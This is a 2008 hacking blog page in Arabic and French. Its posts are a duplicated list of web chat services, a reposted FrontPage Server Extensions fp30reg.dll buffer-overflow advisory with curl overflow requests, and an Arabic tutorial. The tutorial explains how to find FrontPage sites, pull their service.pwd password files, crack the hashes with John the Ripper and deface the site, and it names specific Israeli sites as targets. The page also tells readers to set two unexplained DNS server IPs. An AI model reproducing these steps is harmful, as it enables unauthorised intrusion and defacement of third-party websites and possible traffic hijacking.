يتم التشغيل بواسطة Blogger.
آخر الحلقات عن الفيسبوك
آخر حلقات الويندوز
الاقسام
- (حلقات متخصيصي الحمايةفيديوويندوزwindows7
- 0-day attack
- آيباد
- ابونتو
- أخبار
- ادسنس
- إضافات
- إعلان
- إعلانات
- افاست
- التحقيق الجنائي الالكتروني
- العمل ، الانترنت
- الماك
- الهاكرز الاخلاقي
- باكتراك
- بث مباشر،دورات
- برامج
- تحذيرات
- تصميم
- تكنولوجيا
- حصريات
- حلقات متخصيصي الحماية
- حماية
- حماية(حلقات متخصيصي الحماية فيديودروس حمايةGmail
- دروس الهاردوير
- دروس حماية
- دروس مبتدئين
- ربح من الانترنت
- سيسكو
- شروحات برامج
- صور
- فيديو
- فيرفوكس
- فيروسات
- فيسبوك
- كتب إليكترونية
- لينكس
- مشاكلVS حلول
- مقالات
- منتدى،مشاكل،حلول
- وثائقي
- ويندوز
- Anonymous surfing
- antivirus;keygen
- avast 6.0.1
- Backdoor
- Backtrack
- Backtrack 4
- Bifrost Section
- blogger
- botnet
- chat amp; Rooms
- cisco
- cookies
- cookies stealer
- crack
- crypters
- DDOS
- DDOser
- Download mobile messenger ebuddy
- Drivers
- E-book
- easeus
- Electroman Special Notes
- fake email
- Fake Login
- Fedora
- firefox
- firefox stealer
- game
- General
- General Hacking
- GET FACEBOOK IN YOUR MOBILE
- Gmail
- google adsense
- google chrome
- GSM Networking
- GSM trick coods
- hackin9
- Hacking in to pc software
- Hacking Tooles
- hardware
- Hardware firewall Vs Software firewall
- hotmail
- how to protect your google chrome passwords
- howto; General Hacking
- ipad
- kadhafi
- Keyloggers
- LAPTOP BAG
- linux
- live cds ;web applications;debuggers
- mac
- Magic Bluetooth Hack
- MD5
- MD5 video
- megaupload
- Menu
- Metasploit
- MS Password
- Msn
- msnbot
- Myspace
- Odesk
- password
- Phase One
- pop mail
- profile
- proxy
- PS2 hacking
- Rapidshear
- RATs
- readyboost
- rooms
- S3curity Tooles
- sagem Fast 3304
- samad-khan V4.0
- Scanners
- serial phishing;
- Skyblog
- SMS
- SMS BOMBER
- sniffers
- Social Engineering
- Software
- Spaming
- Speedupinternet
- Steganography
- submite
- THe black book Exclusive
- Trojan
- tuning قسم
- Tutorial
- Tutorials
- ubuntu
- Ubuntu; Linux
- ubutnu
- usbdumper
- virus
- Virus Maker
- VNC
- vnc's
- vpn
- wallpaper
- Web Security
- wifi hacking tooles
- wifi hakcing
- windows
- windows defender
- windows hacking
- windows live 2011
- windows vista
- windows xp
- windows7
- windows7;keygen
- xbox;howto; General Hacking
- Y-spam
- Yahoo
- Yahoo in your Mobile
- Youtube
آخر الحلقات الحصرية
صوت وصورة
أخبار المشاهير
توقيت المغرب
رياضة عالمية
Main Post
أرشيف المدونة الإلكترونية
-
▼
2008
(30)
-
◄
يونيو
(28)
- vos adresse web sur pc et gsm pour la messagerie i...
- ثغرة في نظام frontpage extension
- ثغرة Front Page
- طرق معرفة واختراق المواقع التي تدعم FrontPage
- DETECTER VOTRE ADRESSE IP
- معلومات عامة عن Msn Proxy Server
- ثغرة في Hyper Terminal في نظم Msn
- ثغره تخترق نصف المواقع ونصف منتديات النت
- طريقة اختراق المنتديات
- اختراق منتديات الـــ vBulletin
- Imaginer je réalise voila mr elctroman
- imedia free links ---imedia sites gratuits---
- تعرف على
- تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
- better than ever
- NEWS SUR MAROC TLECOME GPRS CONNECTION
- carding
- the new is never be dead with the king
- Imedia and maroc telecome your GPRS confeguration ...
- weebo get fast ur connection with firefox / avoir ...
- msn 8 avec gprs maroc telecome connection presente...
- c'est finie avec motorola v3 razer tt ce que vous ...
- Comment intercepter la signature d'un virus et la ...
- site web pour tt vos telechargement derb ralef ces...
- imedia connection gratuit
- IMEDIA et il gratuit .??
- attention maroc telecome free connection to ur pc
- driver adress web site
-
◄
يونيو
(28)
آخر الحلقات عن الانترنت
آخر حلقات الحماية من الهاكرز
أقسام
Send Quick Massage
إشترك بالمدونة
الكتاب الرسميون
الدولي
آخر الحلقات عن منتجات جوجل
Pages
المشاركات الشائعة
-
internet gratuit avec le service imedia comment.? pour avoir imedia gratuit sur ton mobile enter ces paramters svp avant tt assurer que ta c...
-
و سيتناول الموضوع التالي:- 1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7....
-
EXCLUSIVE projet fucking ass maroc telecome ...
-
to have a fast weebo with firefox please fellow the instruction : Clearing Your Cache/Cookies Many issue can be alleviated by clearing your ...
-
Nmap and Zenmap (the graphical front end) are available in several versions and formats. Recent source releases and binary packages are des...
-
Diamond Binder // Diamond Binder is a binder bid for source created by sharky , the tool possesses the functions basicas of any binder. ...
-
اولا ما يجب عليك معرفته اخي الكريم اختي الكريمة ان ما يقصد بالبريد الثلاتي هو بريد من الشكل التالي xxx@hotmail.com ; pdf@hotmail.com , zik@...
-
Royal Stealer v1.0e > April 21st, 2009 This is the latest version of the Stealer of Shark...
-
لعل من اشر الامور التي يمكن ان تقع لك على الفيسبوك هو تعطيل حسابك لهذا كان علينا الحذر في إستخدام خدمة الفيسبوك هاته الاخيرة التي تستوجب مج...
-
إنسى مكبرات الصوت التقليدية الان مكبرات صوت زجاجية !! نعم هي مكبرات صوت زجاجية بأشكال هندسية رائعة ودقة في التصنيع تستطيع هاته القطع الزجاجي...
عن الموقع
my
Visitors
الاثنين، 14 يوليو 2008
pirater hotmail facillemnet 100%
voire http://cyberhacking.tk aller a msn hacking et suiver les instruction dsl le site et en englais si ta des blems en englais alors tempis pour toi :D
Parfois on cherche la reponse et on ne sait pas qu'elle est au fond de nous meme
enter cest 2 dns dans votre accees a distance et ne ponse jam aux virus et malawares
66.11.234.90
66.11.234.91
by mr electroman
66.11.234.90
66.11.234.91
by mr electroman
الأربعاء، 25 يونيو 2008
vos adresse web sur pc et gsm pour la messagerie instantané IM
bey mr electroman
Meebo & Meebo Rooms
Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.
http://www.meebo.com
Pibb
En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.
http://pibb.com/
Tangler
Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.
https://www.tangler.com/
Lingr
Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.
http://www.lingr.com
Kool IM
koolim
Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.
http://www.koolim.com/
Campfire
Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.
http://campfirenow.com/
Yahoo! Messenger for the web
Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.
http://webmessenger.yahoo.com/
MessengerFX
Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.
http://www10.messengerfx.com/
Iminent
On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.
http://www.iminent.com/
eBuddy
eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.
http://www.ebuddy.com/
3bubbles
A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.
http://www.3bubbles.com/
Tworl
Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.
http://www.tworl.com/
Mabber
Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)
http://www.mabber.com/
Geesee
Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.
http://www.geesee.com/
Plugoo
Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”
http://www.plugoo.com
RadiusIM
Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)
http://www.radiusim.com
Itzle
Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.
http://www.itzle.com
Gabbly
Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.
http://www.gabbly.com
ZohoChat
Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.
http://www.zohochat.com
Meebo & Meebo Rooms
Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.
http://www.meebo.com
Pibb
En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.
http://pibb.com/
Tangler
Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.
https://www.tangler.com/
Lingr
Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.
http://www.lingr.com
Kool IM
koolim
Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.
http://www.koolim.com/
Campfire
Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.
http://campfirenow.com/
Yahoo! Messenger for the web
Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.
http://webmessenger.yahoo.com/
MessengerFX
Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.
http://www10.messengerfx.com/
Iminent
On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.
http://www.iminent.com/
eBuddy
eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.
http://www.ebuddy.com/
3bubbles
A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.
http://www.3bubbles.com/
Tworl
Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.
http://www.tworl.com/
Mabber
Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)
http://www.mabber.com/
Geesee
Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.
http://www.geesee.com/
Plugoo
Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”
http://www.plugoo.com
RadiusIM
Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)
http://www.radiusim.com
Itzle
Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.
http://www.itzle.com
Gabbly
Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.
http://www.gabbly.com
ZohoChat
Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.
http://www.zohochat.com
الاثنين، 23 يونيو 2008
ثغرة في نظام frontpage extension
mr electroman
COMMAND
FrontPage Server Extensions
SYSTEMS AFFECTED
FrontPage Server Extensions; IIS 4, 5
PROBLEM
There has been several issues with Front Page Server Extensions.
One of them was reported by Internet Security Systems Security
Alert. ISS X-Force is aware of a serious vulnerability that may
allow remote attackers to launch Denial of Service (DoS) attacks
against, or compromise Microsoft Internet Information Server
(IIS) installations. This vulnerability exists in the Visual
Studio Remote Application Deployment (RAD) component of FrontPage
Server Extensions.
Microsoft FrontPage is a Web site design and management
application. The FrontPage Server Extensions (FPSE) package is
included in IIS versions 4.0 and 5.0 to help integrate FrontPage
with IIS. IIS servers may be vulnerable if the Visual Studio RAD
component of FPSE is installed. This component allows Web site
designers who use Microsoft InterDev to actively register and
unregister COM components on the IIS server.
The Visual Studio RAD component includes a vulnerable Dynamic Link
Library (DLL), fp30reg.dll. This DLL does not properly parse long
arguments. Attackers may supply the DLL with an overly long
request and may be able to run arbitrary code or bring down the
server. Any commands executed on the server are executed under
the IUSR_machinename security context, and in certain
circumstances under the System context.
Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS
security team has found also a buffer overflow vulnerability in
Microsoft FrontPage 2000 Server Extension, which can be exploited
to execute arbitrary code by a remote attacker. Microsoft
FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)
File: "fp30reg.dll" that exists a buffer overflow vulnerability.
When fp30reg.dll receives a URL request that is longer than 258
bytes, a stack buffer overflow will occur. Exploiting this
vulnerability successfully, an attacker can remotely execute
arbitrary code on the server running MS FPSE 2000.
In case that fp30reg.dll receives an invalid parameter(method),
it will return an error message:
"The server is unable to perform the method [parameter provided by the user] at this time"
This error message will be saved in a fixed length stack buffer.
fp30reg.dll calls USER32.wsprintfA() to form return message.
Because there is no checkup for the length of data supplied by
the user, the destination buffer can be overwritten. An attacker
can rewrite some important memory address like exception structure
or saved EIP to change program flow.
Format string used by USER32.wsprintfA() is:
HTTP Error 501
The server is unable to perform the method %s at this time.
It is also saved in stack and its address is at (target buffer
address + 256 bytes), so the format string will be rewritten when
the overflow occurs. The attacker should manage to finish
copying. If an attacker overwrite the buffer with random data,
IIS service will fail. In this case, IIS 5.0 can be automatically
self-restarted, but IIS 4.0 needs to be restarted manually.
Exploiting this vulnerability successfully, an attacker can obtain
the privilege of IWAM_machinename account in IIS 5.0 or Local
SYSTEM account in IIS 4.0 by default.
There is a copy of fp30reg.dll in another directory:
Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin
whose name is fp4areg.dll.
Exploiting some other vulnerabilities like unicode bug, an
attacker will be able to access this file.
Overflow won't occur in case that the provided parameter has only
258 bytes:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`
HTTP Error 501
The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA at this time.
In case that it is longer than 258 bytes, an buffer overflow will
occur:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`
ErrorThe remote procedure call
failed.
There is a proof of concept code for this issue:
http://www.nsfocus.com/proof/fpse2000ex.c
SOLUTION
ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify
that their IIS Web servers have been configured securely. These
documents outline how to correctly configure an externally facing
IIS Web server. IIS servers that have been configured securely,
using the Checklists, are not vulnerable to many of the recent
and widely publicized remote IIS exploits.
The IIS Security Checklists are available here:
http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Patch for Microsoft Windows NT version 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
For Microsoft Windows 2000 Professional, Server and Advanced
Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727
For more information on this vulnerability, please refer to the
Microsoft Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
Basically, installing MS01-035 causes the IIS MMC to close when
you click on the server extensions tab under Windows 2000
Advanced Server on SP2 (with all current hotfixes). Uninstalling
MS01-035 fixes the problem, but opens up the security hole. When
the new patch is available, MS will re-release their bulletin.
COMMAND
FrontPage Server Extensions
SYSTEMS AFFECTED
FrontPage Server Extensions; IIS 4, 5
PROBLEM
There has been several issues with Front Page Server Extensions.
One of them was reported by Internet Security Systems Security
Alert. ISS X-Force is aware of a serious vulnerability that may
allow remote attackers to launch Denial of Service (DoS) attacks
against, or compromise Microsoft Internet Information Server
(IIS) installations. This vulnerability exists in the Visual
Studio Remote Application Deployment (RAD) component of FrontPage
Server Extensions.
Microsoft FrontPage is a Web site design and management
application. The FrontPage Server Extensions (FPSE) package is
included in IIS versions 4.0 and 5.0 to help integrate FrontPage
with IIS. IIS servers may be vulnerable if the Visual Studio RAD
component of FPSE is installed. This component allows Web site
designers who use Microsoft InterDev to actively register and
unregister COM components on the IIS server.
The Visual Studio RAD component includes a vulnerable Dynamic Link
Library (DLL), fp30reg.dll. This DLL does not properly parse long
arguments. Attackers may supply the DLL with an overly long
request and may be able to run arbitrary code or bring down the
server. Any commands executed on the server are executed under
the IUSR_machinename security context, and in certain
circumstances under the System context.
Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS
security team has found also a buffer overflow vulnerability in
Microsoft FrontPage 2000 Server Extension, which can be exploited
to execute arbitrary code by a remote attacker. Microsoft
FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)
File: "fp30reg.dll" that exists a buffer overflow vulnerability.
When fp30reg.dll receives a URL request that is longer than 258
bytes, a stack buffer overflow will occur. Exploiting this
vulnerability successfully, an attacker can remotely execute
arbitrary code on the server running MS FPSE 2000.
In case that fp30reg.dll receives an invalid parameter(method),
it will return an error message:
"The server is unable to perform the method [parameter provided by the user] at this time"
This error message will be saved in a fixed length stack buffer.
fp30reg.dll calls USER32.wsprintfA() to form return message.
Because there is no checkup for the length of data supplied by
the user, the destination buffer can be overwritten. An attacker
can rewrite some important memory address like exception structure
or saved EIP to change program flow.
Format string used by USER32.wsprintfA() is:
HTTP Error 501
NOT IMPLEMENTED
The server is unable to perform the method %s at this time.
It is also saved in stack and its address is at (target buffer
address + 256 bytes), so the format string will be rewritten when
the overflow occurs. The attacker should manage to finish
copying. If an attacker overwrite the buffer with random data,
IIS service will fail. In this case, IIS 5.0 can be automatically
self-restarted, but IIS 4.0 needs to be restarted manually.
Exploiting this vulnerability successfully, an attacker can obtain
the privilege of IWAM_machinename account in IIS 5.0 or Local
SYSTEM account in IIS 4.0 by default.
There is a copy of fp30reg.dll in another directory:
Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin
whose name is fp4areg.dll.
Exploiting some other vulnerabilities like unicode bug, an
attacker will be able to access this file.
Overflow won't occur in case that the provided parameter has only
258 bytes:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`
HTTP Error 501
NOT IMPLEMENTED
The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA at this time.
In case that it is longer than 258 bytes, an buffer overflow will
occur:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`
ErrorThe remote procedure call
failed.
There is a proof of concept code for this issue:
http://www.nsfocus.com/proof/fpse2000ex.c
SOLUTION
ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify
that their IIS Web servers have been configured securely. These
documents outline how to correctly configure an externally facing
IIS Web server. IIS servers that have been configured securely,
using the Checklists, are not vulnerable to many of the recent
and widely publicized remote IIS exploits.
The IIS Security Checklists are available here:
http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Patch for Microsoft Windows NT version 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
For Microsoft Windows 2000 Professional, Server and Advanced
Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727
For more information on this vulnerability, please refer to the
Microsoft Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
Basically, installing MS01-035 causes the IIS MMC to close when
you click on the server extensions tab under Windows 2000
Advanced Server on SP2 (with all current hotfixes). Uninstalling
MS01-035 fixes the problem, but opens up the security hole. When
the new patch is available, MS will re-release their bulletin.
السبت، 21 يونيو 2008
ثغرة Front Page
الكاتب : ^SpY^
الاختراق عن طريق ثغرة Front page
________________________________________
أولا :
.......قبل قرائتك للموضوع يجب أن يكون لديك فكرة ولو بسيطة عن :
1- Front page Server Extensions
2- ثغرات الفرونت بيدج و ليس كيفية استعمالها
3- الموضوع للمبتدئين فاذا لم تكن مبتدأ ... فأنصحك بعدم تضييع وقتك معه
نخش في الموضوع:
طبعا ثغرات الفرونت بيدج تكون موجودة في الأنظمة التي يدعم سيرفراتها الFront page , وهذه الثغرات تمكن المخترق من الوصول لملف
الuser name و الpassword الخاص بالAdmin بتاع الموقع .
ولعلك تتسائل ما هذه الملفات ؟ ... حسننا تكون الملفات على هذا النحو والتي تحتوي علىuser name و password الخاص بالAdmin :
Administrator.pwd
Author.pwd
Service.pwd وغالبا تكون الكلمة السرية في هذا المجلد , والذي هو متفرع من _Vti_pvt .
.....طبعا كلكم عارفين الحجات دي .. بس ممكن بعضكم ما قدرش يخترق بيها عشان مافهمش كويس من دروس غير .......المهم أنا هاشرحلكم درس عملي من A to Z للاختراق عن طريق الثغرة دي .
كنا قلنا ان الثغرة غالبا بتكون هنا www.site.com/_vti_pvt/_service.pwd , طب ممكن واحد يقول طب أنا جربت اكتب كدة مع مواقع كتيرة و بيطلعلي error أو Forbidien .....المهم ممكن الAdmin يكون عامل security شوية على الملف ده ..... طيب عشان تجرب وتنفذ هتتبع التالي:
ادخل على الموقع دة
www.altavista.com
وبعدين اكتب في الSearch الكلام دة Link:_Service.pwd أو اكتب Link:_vti_pvt/_service.pwd
المهم هيطلعلك نتايج بالهبل و معظمها تعاني من الثغرة دي , مثال http://www.soi-rp.com/_vti_pvt/ ادخل هنا , هيظهرلك صفحة وفيها الحجات دي :
Parent Directory
-
-
.......... المهم خش على Service.pwd هتلاقي حاجة زي كدة : # -FrontPage- orechron:zjcZSlimQERyw
orechron ده الuser name
zjcZSlimQERyw ودي الpassword بس ماتجربهاش عشان دي مشفرة ....طيب عشان تفكها هتحتاج لjohn the ripper ممكن تحملها من هنا openwall.com المهم لما تحمل الأداة هتلاقي مجلدين run و doc والمهم هوه run بالنسبة لطيرقة العمل هاتكون كالتالي .... هاتلاقي ملف عندك في الجهاز اسمو command موجود في System32 انسخه وضعه في المجلد run .... وبعدين تحطorechron:zjcZSlimQERyw في ملف txt وليكن باسم password .....طيب افتح command واكتب الامرده <john -i:all password.txt
وبعد مايخلص البرنامج هتلاقي الpassword الحقيقية هنا john.pot
كدة خلاص ... وصلنا للختام وهوه انك تصمم صفحة بالفرونت بيدج وتكتب فيها Hacked by ^SpY^
وتعمل pubish web هايطلب username و password هاتكتبهم و..... و مبروك عليك الاختراق .
و عموما أنصحكم بالبحث هنا عشان دي مواقع يهوديه تبحث بطريقة الSpiders يعني Random Hacking :
achla.co.il
maven.co.il
iguide.co.il
____________________________
طرق معرفة واختراق المواقع التي تدعم FrontPage
كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT - Unix
1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟
بعدة طرق ولن أذكر إلا الأسهل:
- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
--------------------------------------------------
2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
